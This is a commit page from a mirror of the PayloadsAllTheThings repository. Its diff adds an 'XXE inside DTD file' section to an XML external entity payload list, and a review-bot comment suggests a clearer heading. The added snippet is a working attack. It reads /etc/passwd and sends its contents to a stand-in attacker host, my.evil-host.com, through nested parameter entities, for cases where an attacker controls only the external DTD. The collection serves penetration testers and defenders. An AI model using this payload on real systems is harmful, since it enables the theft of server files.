mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add XXE via DTD file
This commit is contained in:
parent
4c7dd435a6
commit
92667a12a4
@ -31,6 +31,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||||||
- [XXE inside SOAP](#xxe-inside-soap)
|
- [XXE inside SOAP](#xxe-inside-soap)
|
||||||
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
||||||
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
||||||
|
- [XXE inside DTD file](#xxe-inside-dtd-file)
|
||||||
- [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)
|
- [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
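Review bot: the entry title `XXE inside DTD file` does not say what sets this case apart, since every XXE variant in this file lives in a DTD; the distinguishing precondition is that only the external DTD is attacker-controlled, so a title along the lines of `XXE via externally controlled DTD file` (with the heading and `#...` anchor renamed to match) would make that visible from the table of contents. The anchor as written, `#xxe-inside-dtd-file`, does match the slug of the `### XXE inside DTD file` heading added further down, and the entry sits in the same position in the list as the section does in the file, so no link fix is needed if the name stays.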
@ -516,6 +517,21 @@ updating: xl/_rels/workbook.xml.rels (deflated 66%)
|
|||||||
updating: xl/sharedStrings.xml (deflated 17%)
|
updating: xl/sharedStrings.xml (deflated 17%)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### XXE inside DTD file
|
||||||
|
|
||||||
|
Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file.
|
||||||
|
In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM.
|
||||||
|
When all you control is the DTD file, and you do not control the `xml` file, XXE may still be possible with this payload.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<!-- Load the contents of a sensitive file into a variable -->
|
||||||
|
<!ENTITY % payload SYSTEM "file:///etc/passwd">
|
||||||
|
<!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
|
||||||
|
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://my.evil-host.com/x=%payload;">'>
|
||||||
|
%param1;
|
||||||
|
%external;
|
||||||
|
```
|
||||||
|
|
||||||
### XXE WAF Bypass via convert character encoding
|
### XXE WAF Bypass via convert character encoding
|
||||||
|
|
||||||
In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>
|
In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>
|
||||||
|